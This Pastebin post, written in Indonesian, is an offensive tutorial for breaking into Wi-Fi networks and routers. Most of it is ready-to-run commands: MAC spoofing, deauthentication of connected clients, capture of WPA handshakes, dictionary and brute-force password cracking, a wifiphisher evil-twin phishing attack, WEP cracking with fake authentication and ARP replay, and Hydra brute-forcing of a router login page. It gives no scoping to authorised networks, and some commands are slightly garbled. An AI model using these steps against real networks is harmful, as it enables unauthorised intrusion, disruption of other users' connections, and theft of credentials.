Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wifi Hacking and Router Dictionary Attack
- Anon Cyber Team
- oke kali ini saya akan share tutorial wifi security tester
- pertama tama kita akan mempelajari dasarnya, dengan perintah "ifconfig"
- ini adalah melihat settingan interface dan dapat konfigurasi oke kali ini kita akan menggunakan wlan0 (keseringan) namun kalian perlu inget , membutuhkan adapter khusus yang bisa melihat packet dan inject packet untuk melakukan ini, kalian bisa membeli ini di mana pun
- saya akan melihat info tentang wlan0 dengan memasukan perintah ini "ifconfig wlan0"
- kalian juga bisa memasukan perintah "iwconfig" untuk melihat settingan
- selain itu kalian juga bisa memasukan perintah "ifconfig wlan0 up" untuk menyalakan dan "ifconfig wlan0 down" untuk membuat tutup
- oke setelah itu kita akan mempelajari mengaktifkan monitor mode, secara dasar monitor mode mengizinkan kita melihat semua data, kalo kita masih promiscuous mode (default / managed) kalian bisa liat ini dengan memasukan "iwconfig" untuk melihat apakah itu managed mode atau tidak
- kalo managed mode bila packet itu bukan untuk kita maka kita akan mendiamkannya, maka kita perlu membuat jadi monitor mode
- namun sebelum kita membuat jadi monitor mode, terkadang ada beberapa software yang membuat monitor mode menjadi managed mode lagi, oleh karena itu kita harus terminasi mereka dengan perintah ini "airmon-ng check kill"
- oke mari kita buat wlan0 menjadi monitor mode dengan perintah "airmon-ng start wlan0"
- maka akan ada interface lain bernama wlan0mon
- oke kali ini kita akan belajar sniffing packet
- kita bisa menggunakan Wireshark pilih interface monitor mode mu (kalo saya adalah wlan0mon)
- untuk saya akan membuat tutorialnya lain kali
- oke kalo kalian ingin menjadi managed mode lagi kalian tinggal memasukan perintah ini "airmon-ng stop wlan0mon" namun kalian gak bisa konek karena service nya tadi udah dimatikan, kalian bisa menghidupkan nya lagi dengan memasukan perintah ini "service network-manager start"
- oke namun saya masih ingin monitor mode, oke kali ini kita akan sniffing dengan command line
- dengan memasukan perintah "airodump-ng wlan0mon"
- BSSID = Mac Address dari Access Point
- PWR = kekuatan sinyal yang dilaporkan NIC
- RXQ = kualitas (dihitung dengan beberapa packet keterima dalam 10 detik)
- Beacon = AP kadang ngasih beacon agar bisa terdeteksi oleh komputer anda
- CH = Channel yang digunakan AP
- oke setelah ini saya akan setting ulang lagi pada posisi awal
- oke kali ini kita akan melihat cara spesifik sniffing juga mengubah mac oke untuk itu kita perlu mematikan dlu interface kita dengan perintah "ifconfig wlan0 down"
- "macchanger -r wlan0"
- oke kita akan mendapatkan mac address baru (secara random)
- pada dasarnya mac address itu ada di hardware dan tidak bisa diubah, namun kita bisa manipulasi dari sistem operasinya yang mengsavenya sehingga kita mengubah settingannya
- oke kita akan siap siap mengubah lagi mnejadi monitor mode dengan perintah "airmon-ng check kill" kemudian "airmon-ng start wlan0"
- oke kali ini kita akan segera akan spesifikiasi BSSID "airodump-ng - -bssid wlan0mon"
- oke sekarang kita akan bahas deauthentication attack
- hal yang kita perlu butuh itu BSSID CH SSID dan juga MAC target (kalo semua nya gak perlu)
- "aireplay-ng -0 0 -a BSSID -c MAC_target wlan0mon"
- namun kita harus sesuaikan dengan channel yang kita mau dengan memasukan
- "airmon-ng start wlan0mon "
- oke sehingga itu yang diperlukan untuk melakukan deauthentication attack
- Oke setelah itu kita akan belajar cara menangkap 4 way handshake, pertama tama pastiin kau sudah di monitor mode
- Kedua kalian masukin ini "airodump-ng - -bssid (BSSID) - -channel (CH) - -write (save as) wlan0mon"
- Yang saya akan masukan adalah
- "Airodump-ng - -bssid AA:AA:AA:AA:AA:AB - -channel 1 - -write desktop/wifi wlan0mon"
- Kemudian kalian tinggal deauthentication attack terus airodump-ng akan ada tulisan captured handshake, kemudian berhentikan, dan liat akan ada file baru ditempat yang kau namain, gampang bukan?
- Oke kali ini kita akan bahas beberapa penyerangan
- 1.Dictionary Attack, 2.Brute force, 3.wifi phiser
- 4.WEP cracking 5.WPS cracking
- File saya bernama wifi-01.cap
- Wordlist udah ada di kali linux di "usr/share/wordlists" (di gunzip dlu)
- Dictionary attack : aircrack-ng
- Oke kita tinggal masukan ini
- "Aircrack-ng desktop/wifi-01.cap -w (wordlist)"
- Brute force
- "Crunch 1 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng desktop/wifi-01.cap -w- "
- Angka 1 pada crunch menunjukan dia mencoba dari hanya 1 karakter, angka 8 menunjukan 8 karakter, hingga crunch mencoba dari 1 sampai 8 karakter, sedangkan abcd.....789 adalah karakter yang digunakan, sisahnya ganti saja cap file sedangkan pada -w kasih - lagi pada akhirnya jadi -w-
- Wifiphiser
- Anda membutuhkan dua adapter untuk ini saya menggunakan interface wlan0 dan wlan1
- Masukan "python wifiphiser -jI wlan0 aI wlan1"
- Anda melihat di video gak ada ini? Karena wifiphiser melihat mana interface terkuat untuk jadi jI (Jamming Interface) dan kedua terkuat untuk jadi aI (AP interface), anda tentu memerlukan 2 interface
- Kemudian ada list, kalo perlu masukan Ctrl+c kemudian pilih SSID dan tunggu sudah :D
- Oke WEP caranya gak beda jauh namun
- Kita gak gunakan deauthentication attack namun kita menggunakan "fake authentication" dan "arp replay"
- Ketika airodump-ng melakukan spesified sniffing kita akan gunakan 2 ini (bukan deauth attack) pertama fake authentication, mengapa perlu? Karena tanpanya kita gak bisa ngespam data (arp replay)
- Dengan perintah
- "Aireplay-ng -1 0 -a (BSSID) -h (mac anda) -e (essid) wlan0mon"
- Oke setelah itu bila ada tulisan association successful maka berhasil kalo tulisannya deauth kayak gitu, artinya gagal
- Setelah itu lakukan arp replay (agar bisa di decode)
- Aireplay-ng -3 0 -b (bssid) -h (mac anda) wlan0mon kemudian selesai
- Tinggal bajak dengan aircrack-ng
- Aircrack-ng -b (bssid) (cap file)
- Router Hacking
- Dictionary using hydra syntax :
- Hydra http://[192.168.0.1]/login.html -e ns -F -V -t 4 -L (list username) -P (list password
- Kalo ip pakek "[]" karena nanti bingung
- Kalo 1 username pakek lowercase L "l"
- Kalo 1 password pakek lowercase P "p"
- -F kalo udah berhenti
- -V nunjukin hasil di terminal
Add Comment
Please, Sign In to add comment